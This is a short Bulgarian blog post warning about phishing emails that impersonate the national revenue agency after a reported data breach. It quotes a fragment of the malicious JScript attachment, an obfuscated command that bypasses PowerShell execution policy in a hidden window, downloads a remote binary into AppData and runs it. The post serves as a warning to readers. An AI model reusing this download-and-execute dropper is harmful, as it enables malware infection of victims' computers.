Потребителски вход

Запомни ме | Регистрация
Постинг
07.10.2016 22:24 - Поредния пробив в базата на НАП
Автор: akrachev Категория: Технологии   
Прочетен: 303 Коментари: 0 Гласове:
1


Постингът е бил сред най-популярни в категория в Blog.bg
 Тъй като не гледам телевизия, не разбрах своевременно, че е имало пробив тези дни в системата на НАП и са били изтеглени данни на респондентите, та ми се наложи на практика да се запозная със случая.

Въпросните хакери след като за изтеглили електронните адреси, изпращат към тях писма със заглавие "Уведомление относно промени в регламента за подаване на декларации към НАП"  и подател Национална агенция за приходите

В писмото има прикачен файл известие_432439.rar, което разбира се съдържа Windows scripting host зловреден код. Дано всички счетоводители да гледат телевизия и да са спокойни, когато са получили писмото. 

Аз лично като видях .js файла в RAR архива си помислих, че вероятно ще тегли софтуер от НАП. Чак като се зачетох вътре и видях "var soghax = WScript.CreateObject("WScRIPt.SHEll");
if (typeof scyqwy() == "number") { var zexofhimq = "CMd.Exe /c " + mhymukod + " -eXecu^TIo^N^poli^cy^ BYpasS  -N^o^prOfi^lE^     -w^indOW^s^tyLe   ^h^iDDen^ (NEW^-ObJEcT    ^S^y^STEM^.N^et^.w^e^b^cl^Ien^T).^do^wn^lOADfile(^"" + zxytu + "c.bin" + "","%ApPdaTa%.EXE");sTaRT-pR^o^CE^s^S "%AppdATA%.eXe""; "
разбрах, че нещо не е наред...







Гласувай:
1
0



Няма коментари
Търсене

За този блог
Автор: akrachev
Категория: Лични дневници
Прочетен: 205993
Постинги: 164
Коментари: 53
Гласове: 71
Календар
«  Януари, 2018  
ПВСЧПСН
1234567
891011121314
15161718192021
22232425262728
293031